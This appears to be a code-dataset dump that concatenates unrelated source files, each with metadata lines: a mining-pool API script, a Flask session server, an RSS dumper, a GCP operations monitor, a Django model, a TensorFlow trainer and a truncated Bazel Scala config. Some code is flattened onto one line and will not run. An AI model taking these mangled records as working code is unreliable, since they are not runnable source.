# -*- coding: utf-8 -* from urllib.request import Request, urlopen import json Coin=("adzcoin", "auroracoin-qubit", "bitcoin", "bitcoin-cash", "bitcoin-gold", "dash", "digibyte-groestl", "digibyte-qubit", "digibyte-skein", "electroneum", "ethereum", "ethereum-classic", "expanse", "feathercoin", "gamecredits", "geocoin", "globalboosty", "groestlcoin", "litecoin","maxcoin", "monacoin","monero","musicoin", "myriadcoin-groestl","myriadcoin-skein", "myriadcoin-yescrypt", "sexcoin", "siacoin", "startcoin", "verge-scrypt", "vertcoin", "zcash", "zclassic", "zcoin", "zencash") ApiData= "" Api= "&api_key="+ApiData Action=("getminingandprofitsstatistics", "getautoswitchingandprofitsstatistics", "getuserallbalances", "getblockcount","getblocksfound", "getblockstats", "getcurrentworkers","getdashboarddata","getdifficulty", "getestimatedtime", "gethourlyhashrates","getnavbardata", "getpoolhashrate", "getpoolinfo", "getpoolsharerate", "getpoolstatus", "gettimesincelastblock" ,"gettopcontributors", "getuserbalance", "getuserhashrate", "getusersharerate", "getuserstatus", "getusertransactions", "getuserworkers", "public") def menu_coin(): global c try: c except NameError: for index, group in enumerate(Coin): print("%s: %s" % (index, group)) c = int(input("coin to choose: ")) print("selected: ", Coin[c]) else: print("default coin: ", Coin[c]) def menu_action(): global a try: a except NameError: for index, group in enumerate(Action): print("%s: %s" % (index, group)) a = int(input("action: ")) print("selected:",Action[a]) else: print("default Action: ", Action[a]) def fonction(c): Url="https://"+Coin[c]+".miningpoolhub.com/index.php?page=api&action="+Action[a]+Api print("url:", Url) Req = Request(Url, headers={'User-Agent': 'Mozilla/5.0'}) Webpage = urlopen(Req).read() jsonToPython = json.loads(Webpage) print(jsonToPython) c=33 #comment to enable coin menu selection a=18 #comment to enable action menu selection menu_coin() menu_action() print() fonction(c)
en
0.591166
# -*- coding: utf-8 -* #comment to enable coin menu selection #comment to enable action menu selection
2.275413
2
runner/srv.py
StarNumber12046/activities
3
6627918
from flask import Flask, request import json, traceback test = Flask("test") @test.route("/add", methods=['GET', 'POST']) def bruh(): if request.method == "POST": print(request) print(dir(request.data)) print(request.data.decode()) correct = request.data.decode().replace("'", '"') print(correct) try: print(json.loads(correct)) f = open("session.json", "w") session = json.dump(json.loads(correct), fp=f) f.close() print(session) except: traceback.print_exc() print(type(request.data.decode())) #print(json.loads(request.data.decode())) return {"status": "OK"} @test.route("/get_status") def return_status(): f = open("session.json", "r") return json.load(f) f.close() @test.route("/render_banner") def render_banner(): return {"status": "error", "description":"this function is not ready!"} @test.route("/return_important") def get_most_important(): f = open("session.json", "r") files = json.load(f) f.close() important = ["code", "discord", "paint"] #change with your priority list of apps in main.py for a in important: try: if files[a]: return a except: pass test.run(host="0.0.0.0", port=5555)
from flask import Flask, request import json, traceback test = Flask("test") @test.route("/add", methods=['GET', 'POST']) def bruh(): if request.method == "POST": print(request) print(dir(request.data)) print(request.data.decode()) correct = request.data.decode().replace("'", '"') print(correct) try: print(json.loads(correct)) f = open("session.json", "w") session = json.dump(json.loads(correct), fp=f) f.close() print(session) except: traceback.print_exc() print(type(request.data.decode())) #print(json.loads(request.data.decode())) return {"status": "OK"} @test.route("/get_status") def return_status(): f = open("session.json", "r") return json.load(f) f.close() @test.route("/render_banner") def render_banner(): return {"status": "error", "description":"this function is not ready!"} @test.route("/return_important") def get_most_important(): f = open("session.json", "r") files = json.load(f) f.close() important = ["code", "discord", "paint"] #change with your priority list of apps in main.py for a in important: try: if files[a]: return a except: pass test.run(host="0.0.0.0", port=5555)
en
0.506601
#print(json.loads(request.data.decode())) #change with your priority list of apps in main.py
2.544496
3
glassball/cmd_rawfeed.py
bwanders/glassball-rss
0
6627919
<filename>glassball/cmd_rawfeed.py import pprint import textwrap import feedparser from .common import Configuration, CommandError, log_error, log_message def register_command(commands, common_args): args = commands.add_parser('raw-feed', help='Retrieves and dumps a raw feed', parents=[common_args]) args.add_argument('url', help='The feed URL') args.add_argument('-a', '--all', action='store_true', help='Output all entry information as well as the feed information') args.set_defaults(command_func=command_rawfeed) def command_rawfeed(options): # Helper to do an indented pretty print def indent_pprint(thing, prefix=' '): print(textwrap.indent(pprint.pformat(thing), prefix)) # This is completely opinionated: anything not starting with `http` is not # retrievable... if not options.url.startswith('http'): # If we are given a config, we can try to look up a non-URL parameter # against the feeds in the config if Configuration.exists(options.config): config = Configuration(options.config) feed = config.get_feed(options.url) if feed: options.url = feed.url else: raise CommandError("Cannot translate name '{}' to a feed URL with '{}'".format(options.url, options.config)) else: raise CommandError("Given url '{}' does not seem to be a retrievable URL".format(options.url)) # Proceed to retrieve the feed feed = feedparser.parse(options.url) display_keys = set(feed.keys()) - {'entries'} first = True for key in sorted(display_keys): if not first: print() first = False print("{}:".format(key)) indent_pprint(feed[key]) if options.all: for entry in feed.entries: print() print("Article:") indent_pprint(entry)
<filename>glassball/cmd_rawfeed.py import pprint import textwrap import feedparser from .common import Configuration, CommandError, log_error, log_message def register_command(commands, common_args): args = commands.add_parser('raw-feed', help='Retrieves and dumps a raw feed', parents=[common_args]) args.add_argument('url', help='The feed URL') args.add_argument('-a', '--all', action='store_true', help='Output all entry information as well as the feed information') args.set_defaults(command_func=command_rawfeed) def command_rawfeed(options): # Helper to do an indented pretty print def indent_pprint(thing, prefix=' '): print(textwrap.indent(pprint.pformat(thing), prefix)) # This is completely opinionated: anything not starting with `http` is not # retrievable... if not options.url.startswith('http'): # If we are given a config, we can try to look up a non-URL parameter # against the feeds in the config if Configuration.exists(options.config): config = Configuration(options.config) feed = config.get_feed(options.url) if feed: options.url = feed.url else: raise CommandError("Cannot translate name '{}' to a feed URL with '{}'".format(options.url, options.config)) else: raise CommandError("Given url '{}' does not seem to be a retrievable URL".format(options.url)) # Proceed to retrieve the feed feed = feedparser.parse(options.url) display_keys = set(feed.keys()) - {'entries'} first = True for key in sorted(display_keys): if not first: print() first = False print("{}:".format(key)) indent_pprint(feed[key]) if options.all: for entry in feed.entries: print() print("Article:") indent_pprint(entry)
en
0.873948
# Helper to do an indented pretty print # This is completely opinionated: anything not starting with `http` is not # retrievable... # If we are given a config, we can try to look up a non-URL parameter # against the feeds in the config # Proceed to retrieve the feed
2.86599
3
main.py
edwardchuang/appengine-operation-monitor
0
6627920
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import webapp2 import httplib2 import os from pprint import pprint from datetime import datetime from datetime import timedelta from googleapiclient import discovery from google.appengine.api import mail from google.appengine.api import app_identity from google.appengine.api import memcache class CronJob(webapp2.RequestHandler): def sendNotification(self, instances, project): body = """<html><head><body><table><tr><th>instance</th><th>zone</th><th>operation</th><th>time (UTC)</th><th>duration</th></tr>%%ROWS%%</table> <br><br>check more information on <a href="https://console.cloud.google.com/compute/operations?project=%%PROJECT%%">https://console.cloud.google.com/compute/operations?project=%%PROJECT%%</a> """ rows = "" for instance in instances: tmp = ("<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % ( instance['instance'], instance['zone'], instance['operationType'], instance['startTime'], instance['duration'])) rows += tmp body = body.replace('%%ROWS%%', rows).replace("%%PROJECT%%", project) message = mail.EmailMessage( sender='<EMAIL>()), subject="Instance Operations Detected") message.to = os.environ.get('NOTIFICATION_RECEIVER') message.html = body message.send() def getOperationList(self, project): ret = [] filter = ['compute.instances.migrateOnHostMaintenance', 'compute.instances.hostError'] http = httplib2.Http() service = discovery.build("compute", "v1") request = service.globalOperations().aggregatedList(project=project, orderBy='creationTimestamp desc') while request is not None: response = request.execute() if 'items' not in response.keys(): break for zone in response['items']: # no operations in this zone if 'operations' not in response['items'][zone].keys(): continue for operation in response['items'][zone]['operations']: if operation['operationType'] not in filter: continue if memcache.get('__OperationId{}'.format(operation['id'])): # found in memcache, duplicated continue instance = operation['targetLink'].split('/')[-1] operationType = operation['operationType'] endTime = datetime.strptime(operation['endTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S') startTime = datetime.strptime(operation['startTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S') duration = endTime - startTime ret.append({ 'instance': instance, 'operationType': operationType.split('.')[-1], 'startTime': str(startTime), 'endTime': str(endTime), 'zone': zone.split('/')[-1], 'duration': str(duration) }) memcache.set('__OperationId{}'.format(operation['id']), 1) request = service.globalOperations().list_next(previous_request=request, previous_response=response) if len(ret) is not 0: self.sendNotification(ret, project) return len(ret) def get(self): events = self.getOperationList(os.environ.get('PROJECT_ID') or app_identity.get_application_id()) self.response.headers['Content-Type'] = 'text/plain' self.response.write('OK, {} events detected'.format(events)) class MainPage(webapp2.RequestHandler): def get(self): self.response.headers['Content-Type'] = 'text/plain' self.response.write('OK') app = webapp2.WSGIApplication([ ('/cron', CronJob), ('/.*', MainPage), ], debug=False)
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import webapp2 import httplib2 import os from pprint import pprint from datetime import datetime from datetime import timedelta from googleapiclient import discovery from google.appengine.api import mail from google.appengine.api import app_identity from google.appengine.api import memcache class CronJob(webapp2.RequestHandler): def sendNotification(self, instances, project): body = """<html><head><body><table><tr><th>instance</th><th>zone</th><th>operation</th><th>time (UTC)</th><th>duration</th></tr>%%ROWS%%</table> <br><br>check more information on <a href="https://console.cloud.google.com/compute/operations?project=%%PROJECT%%">https://console.cloud.google.com/compute/operations?project=%%PROJECT%%</a> """ rows = "" for instance in instances: tmp = ("<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % ( instance['instance'], instance['zone'], instance['operationType'], instance['startTime'], instance['duration'])) rows += tmp body = body.replace('%%ROWS%%', rows).replace("%%PROJECT%%", project) message = mail.EmailMessage( sender='<EMAIL>()), subject="Instance Operations Detected") message.to = os.environ.get('NOTIFICATION_RECEIVER') message.html = body message.send() def getOperationList(self, project): ret = [] filter = ['compute.instances.migrateOnHostMaintenance', 'compute.instances.hostError'] http = httplib2.Http() service = discovery.build("compute", "v1") request = service.globalOperations().aggregatedList(project=project, orderBy='creationTimestamp desc') while request is not None: response = request.execute() if 'items' not in response.keys(): break for zone in response['items']: # no operations in this zone if 'operations' not in response['items'][zone].keys(): continue for operation in response['items'][zone]['operations']: if operation['operationType'] not in filter: continue if memcache.get('__OperationId{}'.format(operation['id'])): # found in memcache, duplicated continue instance = operation['targetLink'].split('/')[-1] operationType = operation['operationType'] endTime = datetime.strptime(operation['endTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S') startTime = datetime.strptime(operation['startTime'][:-6][:19], '%Y-%m-%dT%H:%M:%S') duration = endTime - startTime ret.append({ 'instance': instance, 'operationType': operationType.split('.')[-1], 'startTime': str(startTime), 'endTime': str(endTime), 'zone': zone.split('/')[-1], 'duration': str(duration) }) memcache.set('__OperationId{}'.format(operation['id']), 1) request = service.globalOperations().list_next(previous_request=request, previous_response=response) if len(ret) is not 0: self.sendNotification(ret, project) return len(ret) def get(self): events = self.getOperationList(os.environ.get('PROJECT_ID') or app_identity.get_application_id()) self.response.headers['Content-Type'] = 'text/plain' self.response.write('OK, {} events detected'.format(events)) class MainPage(webapp2.RequestHandler): def get(self): self.response.headers['Content-Type'] = 'text/plain' self.response.write('OK') app = webapp2.WSGIApplication([ ('/cron', CronJob), ('/.*', MainPage), ], debug=False)
en
0.757273
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <html><head><body><table><tr><th>instance</th><th>zone</th><th>operation</th><th>time (UTC)</th><th>duration</th></tr>%%ROWS%%</table> <br><br>check more information on <a href="https://console.cloud.google.com/compute/operations?project=%%PROJECT%%">https://console.cloud.google.com/compute/operations?project=%%PROJECT%%</a> # no operations in this zone # found in memcache, duplicated
2.359375
2
collect_image/models.py
ShivanS93/nutrify
1
6627921
import os from django_countries.fields import CountryField from django.contrib.postgres.fields import ArrayField from django.db import models from django.utils.deconstruct import deconstructible from hashid_field import HashidAutoField, Hashid from config.settings import HASHID_FIELD_SALT, AUTH_USER_MODEL @deconstructible class RenameImage(object): """ Renaming the image to the pk """ def __init__(self, sub_path): self.sub_path = sub_path def __call__(self, instance, filename): ext = filename.split(".")[-1] # hash'd name, also the reference_id does not equal the name # of the image file in storage hashname = Hashid( FoodImage.objects.all().count(), salt=f"{instance.date_uploaded}{HASHID_FIELD_SALT}", min_length=7, ) filename = f"{hashname}.{ext}" return os.path.join(self.sub_path, filename) class FoodImage(models.Model): date_uploaded = models.DateTimeField(auto_now_add=True, editable=False) reference_id = HashidAutoField( primary_key=True, salt=f"{date_uploaded}{HASHID_FIELD_SALT}", ) country = CountryField(null=True) image = models.ImageField( upload_to=RenameImage("food_images"), blank=False ) receipe = ArrayField(models.CharField(max_length=255), blank=False) owner = models.ForeignKey( AUTH_USER_MODEL, on_delete=models.CASCADE, default=None, null=True ) def __str__(self): return f"{self.date_uploaded}-{self.reference_id}"
import os from django_countries.fields import CountryField from django.contrib.postgres.fields import ArrayField from django.db import models from django.utils.deconstruct import deconstructible from hashid_field import HashidAutoField, Hashid from config.settings import HASHID_FIELD_SALT, AUTH_USER_MODEL @deconstructible class RenameImage(object): """ Renaming the image to the pk """ def __init__(self, sub_path): self.sub_path = sub_path def __call__(self, instance, filename): ext = filename.split(".")[-1] # hash'd name, also the reference_id does not equal the name # of the image file in storage hashname = Hashid( FoodImage.objects.all().count(), salt=f"{instance.date_uploaded}{HASHID_FIELD_SALT}", min_length=7, ) filename = f"{hashname}.{ext}" return os.path.join(self.sub_path, filename) class FoodImage(models.Model): date_uploaded = models.DateTimeField(auto_now_add=True, editable=False) reference_id = HashidAutoField( primary_key=True, salt=f"{date_uploaded}{HASHID_FIELD_SALT}", ) country = CountryField(null=True) image = models.ImageField( upload_to=RenameImage("food_images"), blank=False ) receipe = ArrayField(models.CharField(max_length=255), blank=False) owner = models.ForeignKey( AUTH_USER_MODEL, on_delete=models.CASCADE, default=None, null=True ) def __str__(self): return f"{self.date_uploaded}-{self.reference_id}"
en
0.926393
Renaming the image to the pk # hash'd name, also the reference_id does not equal the name # of the image file in storage
2.155383
2
tfmodule/trainer.py
kangyounglee/tf-code-pattern-lenet5
1
6627922
<reponame>kangyounglee/tf-code-pattern-lenet5 # Copyright 2018 <NAME> (<EMAIL>) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================================== # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf import numpy as np import time from train_config import TrainConfig from data_loader import MnistDataLoader from data_loader import FileManager from model_builder import get_model from model_config import model_config def train(dataloader_train,dataloader_test,trainconfig_worker): # model building ========================= model_in = tf.placeholder(dtype=model_config['image_dtype'], shape=[None, dataloader_train.IMAGE_SIZE, dataloader_train.IMAGE_SIZE, dataloader_train.NUM_CHANNELS]) labels = tf.placeholder(dtype=model_config['label_dtype'], shape=[None]) with tf.variable_scope(name_or_scope='model',values=[model_in, labels]): dropout_keeprate_node = tf.placeholder(dtype=model_config['image_dtype']) model_out = get_model(model_in =model_in, dropout_keeprate_node =dropout_keeprate_node, train_config =trainconfig_worker, scope ='model') # tf data loading =================================================== with tf.name_scope(name='dataloader'): images_placeholder = tf.placeholder( dtype=model_config['image_dtype'], shape=dataloader_train.image_shape) label_placeholder = tf.placeholder( dtype=model_config['label_dtype'], shape=[None]) train_dataset = dataloader_train.input_fn(images_placeholder,label_placeholder) train_iterator = train_dataset.make_initializable_iterator() # traning ops ============================================= loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels,logits=model_out)) train_op = tf.train.AdamOptimizer(learning_rate=trainconfig_worker.learning_rate).minimize(loss=loss_op) with tf.name_scope('model_out'): model_pred = tf.nn.softmax(model_out) with tf.name_scope('eval_performance'): error = tf.equal(tf.argmax(model_pred,1),labels) tf_pred_accuracy = tf.reduce_mean(tf.cast(error,tf.float32)) # For Tensorboard =========================================== file_writer = tf.summary.FileWriter(logdir=trainconfig_worker.tflogdir) file_writer.add_graph(tf.get_default_graph()) tb_summary_accuracy_train = tf.summary.scalar('accuracy_train', tf_pred_accuracy) tb_summary_accuracy_test = tf.summary.scalar('accuracy_test', tf_pred_accuracy) tb_summary_cost = tf.summary.scalar('loss', loss_op) # training ============================== train_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) test_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) init_var = tf.global_variables_initializer() print('[train] training_epochs = %s' % trainconfig_worker.training_epochs) print('------------------------------------') with tf.Session() as sess: # Run the variable initializer sess.run(init_var) # importing data image_train_numpy, label_train_numpy = \ dataloader_train.import_data(imagefilename=fm.train_images_filename, labelfilename=fm.train_labels_filename) image_test_numpy, label_test_numpy = \ dataloader_test.import_data(imagefilename=fm.test_images_filename, labelfilename=fm.test_labels_filename) sess.run(train_iterator.initializer, feed_dict={images_placeholder: image_train_numpy, label_placeholder: label_train_numpy}) images_train_op, labels_train_op = train_iterator.get_next() avg_cost = 0. rate_record_index = 0 for epoch in range(trainconfig_worker.training_epochs): start_time = time.time() image_train_batch, label_train_batch = sess.run([images_train_op, labels_train_op]) _, minibatch_cost = sess.run([train_op,loss_op], feed_dict={model_in: image_train_batch, labels: label_train_batch, dropout_keeprate_node: trainconfig_worker.dropout_keeprate}) # compute average cost and error rate avg_cost += minibatch_cost if trainconfig_worker.display_step == 0: continue elif epoch % trainconfig_worker.display_step == 0: elapsed_time = time.time() - start_time train_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node: 1.0})) *100.0 test_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node: 1.0})) * 100.0 tb_summary_cost_result, tb_summary_accuracy_train_result = sess.run([tb_summary_cost,tb_summary_accuracy_train], feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node:1.0}) tb_summary_accuracy_test_result = sess.run(tb_summary_accuracy_test, feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node:1.0}) file_writer.add_summary(tb_summary_cost_result,epoch) file_writer.add_summary(tb_summary_accuracy_train_result,epoch) file_writer.add_summary(tb_summary_accuracy_test_result,epoch) print('At epoch = %d, elapsed_time = %.1f ms' % (epoch, elapsed_time)) # print("Training set avg cost (avg over minibatches)=%.2f" % avg_cost) print("Training set Err rate (avg over minibatches)= %.2f %% " % (train_error_rate[rate_record_index])) print("Test set Err rate (total batch)= %.2f %%" % (test_error_rate[rate_record_index])) print("--------------------------------------------") rate_record_index += 1 print("Training finished!") file_writer.close() if __name__ == '__main__': tf.logging.set_verbosity(tf.logging.INFO) trainconfig_worker = TrainConfig() fm = FileManager() # dataloader instance gen dataloader_train = MnistDataLoader(is_training =trainconfig_worker.is_trainable, datasize =trainconfig_worker.train_data_size, batch_size =trainconfig_worker.batch_size, multiprocessing_num=trainconfig_worker.multiprocessing_num, is_image_scaling =True) dataloader_test = MnistDataLoader(is_training =False, datasize =trainconfig_worker.test_data_size) # model tranining with tf.name_scope(name='trainer',values=[dataloader_train,dataloader_test]): train(dataloader_train=dataloader_train, dataloader_test = dataloader_test, trainconfig_worker=trainconfig_worker)
# Copyright 2018 <NAME> (<EMAIL>) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================================== # -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow as tf import numpy as np import time from train_config import TrainConfig from data_loader import MnistDataLoader from data_loader import FileManager from model_builder import get_model from model_config import model_config def train(dataloader_train,dataloader_test,trainconfig_worker): # model building ========================= model_in = tf.placeholder(dtype=model_config['image_dtype'], shape=[None, dataloader_train.IMAGE_SIZE, dataloader_train.IMAGE_SIZE, dataloader_train.NUM_CHANNELS]) labels = tf.placeholder(dtype=model_config['label_dtype'], shape=[None]) with tf.variable_scope(name_or_scope='model',values=[model_in, labels]): dropout_keeprate_node = tf.placeholder(dtype=model_config['image_dtype']) model_out = get_model(model_in =model_in, dropout_keeprate_node =dropout_keeprate_node, train_config =trainconfig_worker, scope ='model') # tf data loading =================================================== with tf.name_scope(name='dataloader'): images_placeholder = tf.placeholder( dtype=model_config['image_dtype'], shape=dataloader_train.image_shape) label_placeholder = tf.placeholder( dtype=model_config['label_dtype'], shape=[None]) train_dataset = dataloader_train.input_fn(images_placeholder,label_placeholder) train_iterator = train_dataset.make_initializable_iterator() # traning ops ============================================= loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels,logits=model_out)) train_op = tf.train.AdamOptimizer(learning_rate=trainconfig_worker.learning_rate).minimize(loss=loss_op) with tf.name_scope('model_out'): model_pred = tf.nn.softmax(model_out) with tf.name_scope('eval_performance'): error = tf.equal(tf.argmax(model_pred,1),labels) tf_pred_accuracy = tf.reduce_mean(tf.cast(error,tf.float32)) # For Tensorboard =========================================== file_writer = tf.summary.FileWriter(logdir=trainconfig_worker.tflogdir) file_writer.add_graph(tf.get_default_graph()) tb_summary_accuracy_train = tf.summary.scalar('accuracy_train', tf_pred_accuracy) tb_summary_accuracy_test = tf.summary.scalar('accuracy_test', tf_pred_accuracy) tb_summary_cost = tf.summary.scalar('loss', loss_op) # training ============================== train_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) test_error_rate = np.zeros(shape=np.ceil(trainconfig_worker.training_epochs/trainconfig_worker.display_step).astype(np.int16), dtype=np.float32) init_var = tf.global_variables_initializer() print('[train] training_epochs = %s' % trainconfig_worker.training_epochs) print('------------------------------------') with tf.Session() as sess: # Run the variable initializer sess.run(init_var) # importing data image_train_numpy, label_train_numpy = \ dataloader_train.import_data(imagefilename=fm.train_images_filename, labelfilename=fm.train_labels_filename) image_test_numpy, label_test_numpy = \ dataloader_test.import_data(imagefilename=fm.test_images_filename, labelfilename=fm.test_labels_filename) sess.run(train_iterator.initializer, feed_dict={images_placeholder: image_train_numpy, label_placeholder: label_train_numpy}) images_train_op, labels_train_op = train_iterator.get_next() avg_cost = 0. rate_record_index = 0 for epoch in range(trainconfig_worker.training_epochs): start_time = time.time() image_train_batch, label_train_batch = sess.run([images_train_op, labels_train_op]) _, minibatch_cost = sess.run([train_op,loss_op], feed_dict={model_in: image_train_batch, labels: label_train_batch, dropout_keeprate_node: trainconfig_worker.dropout_keeprate}) # compute average cost and error rate avg_cost += minibatch_cost if trainconfig_worker.display_step == 0: continue elif epoch % trainconfig_worker.display_step == 0: elapsed_time = time.time() - start_time train_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node: 1.0})) *100.0 test_error_rate[rate_record_index] = (1.0 - tf_pred_accuracy.eval(feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node: 1.0})) * 100.0 tb_summary_cost_result, tb_summary_accuracy_train_result = sess.run([tb_summary_cost,tb_summary_accuracy_train], feed_dict={model_in: image_train_numpy, labels: label_train_numpy, dropout_keeprate_node:1.0}) tb_summary_accuracy_test_result = sess.run(tb_summary_accuracy_test, feed_dict={model_in: image_test_numpy, labels: label_test_numpy, dropout_keeprate_node:1.0}) file_writer.add_summary(tb_summary_cost_result,epoch) file_writer.add_summary(tb_summary_accuracy_train_result,epoch) file_writer.add_summary(tb_summary_accuracy_test_result,epoch) print('At epoch = %d, elapsed_time = %.1f ms' % (epoch, elapsed_time)) # print("Training set avg cost (avg over minibatches)=%.2f" % avg_cost) print("Training set Err rate (avg over minibatches)= %.2f %% " % (train_error_rate[rate_record_index])) print("Test set Err rate (total batch)= %.2f %%" % (test_error_rate[rate_record_index])) print("--------------------------------------------") rate_record_index += 1 print("Training finished!") file_writer.close() if __name__ == '__main__': tf.logging.set_verbosity(tf.logging.INFO) trainconfig_worker = TrainConfig() fm = FileManager() # dataloader instance gen dataloader_train = MnistDataLoader(is_training =trainconfig_worker.is_trainable, datasize =trainconfig_worker.train_data_size, batch_size =trainconfig_worker.batch_size, multiprocessing_num=trainconfig_worker.multiprocessing_num, is_image_scaling =True) dataloader_test = MnistDataLoader(is_training =False, datasize =trainconfig_worker.test_data_size) # model tranining with tf.name_scope(name='trainer',values=[dataloader_train,dataloader_test]): train(dataloader_train=dataloader_train, dataloader_test = dataloader_test, trainconfig_worker=trainconfig_worker)
en
0.72297
# Copyright 2018 <NAME> (<EMAIL>) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================================== # -*- coding: utf-8 -*- # model building ========================= # tf data loading =================================================== # traning ops ============================================= # For Tensorboard =========================================== # training ============================== # Run the variable initializer # importing data # compute average cost and error rate # print("Training set avg cost (avg over minibatches)=%.2f" % avg_cost) # dataloader instance gen # model tranining
2.242902
2
bazel_tools/scala.bzl
gaborh-da/daml
0
6627923
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 load( "@io_bazel_rules_scala//scala:scala.bzl", "scala_binary", "scala_library", "scala_macro_library", "scala_test", "scala_test_suite", ) load( "@io_bazel_rules_scala//jmh:jmh.bzl", "scala_benchmark_jmh", ) load("//bazel_tools:pom_file.bzl", "pom_file") load("@os_info//:os_info.bzl", "is_windows") # This file defines common Scala compiler flags and plugins used throughout # this repository. The initial set of flags is taken from the ledger-client # project. If you find that additional flags are required for another project, # consider whether all projects could benefit from these changes. If so, add # them here. # # Use the macros `da_scala_*` defined in this file, instead of the stock rules # `scala_*` from `rules_scala` in order for these default flags to take effect. common_scalacopts = [ # doesn't allow advance features of the language without explict import # (higherkinds, implicits) "-feature", "-target:jvm-1.8", "-encoding", "UTF-8", # more detailed information about type-erasure related warnings "-unchecked", # warn if using deprecated stuff "-deprecation", "-Xfuture", # better error reporting for pureconfig "-Xmacro-settings:materialize-derivations", "-Xfatal-warnings", # adapted args is a deprecated feature: # `def foo(a: (A, B))` can be called with `foo(a, b)`. # properly it should be `foo((a,b))` "-Yno-adapted-args", "-Ywarn-dead-code", # Warn about implicit conversion between numerical types "-Ywarn-numeric-widen", # Gives a warning for functions declared as returning Unit, but the body returns a value "-Ywarn-value-discard", "-Ywarn-unused-import", # unfortunately give false warning for the `(a, b) = someTuple` # line inside a for comprehension # "-Ywarn-unused" ] plugin_deps = [ "//3rdparty/jvm/org/wartremover:wartremover", ] common_plugins = [ "//external:jar/org/wartremover/wartremover_2_12", ] plugin_scalacopts = [ # do not enable wart remover for now, because we need to fix a lot of # test code, which didn't have wart remover enabled before "-Xplugin-require:wartremover", # This lists all wartremover linting passes. # The list of enabled ones is pretty arbitrary, please ping Francesco for # info "-P:wartremover:traverser:org.wartremover.warts.Any", "-P:wartremover:traverser:org.wartremover.warts.AnyVal", "-P:wartremover:traverser:org.wartremover.warts.ArrayEquals", # "-P:wartremover:traverser:org.wartremover.warts.AsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.DefaultArguments", # "-P:wartremover:traverser:org.wartremover.warts.EitherProjectionPartial", "-P:wartremover:traverser:org.wartremover.warts.Enumeration", # "-P:wartremover:traverser:org.wartremover.warts.Equals", "-P:wartremover:traverser:org.wartremover.warts.ExplicitImplicitTypes", # "-P:wartremover:traverser:org.wartremover.warts.FinalCaseClass", # "-P:wartremover:traverser:org.wartremover.warts.FinalVal", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitConversion", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitParameter", # "-P:wartremover:traverser:org.wartremover.warts.IsInstanceOf", "-P:wartremover:traverser:org.wartremover.warts.JavaSerializable", "-P:wartremover:traverser:org.wartremover.warts.LeakingSealed", # "-P:wartremover:traverser:org.wartremover.warts.MutableDataStructures", # 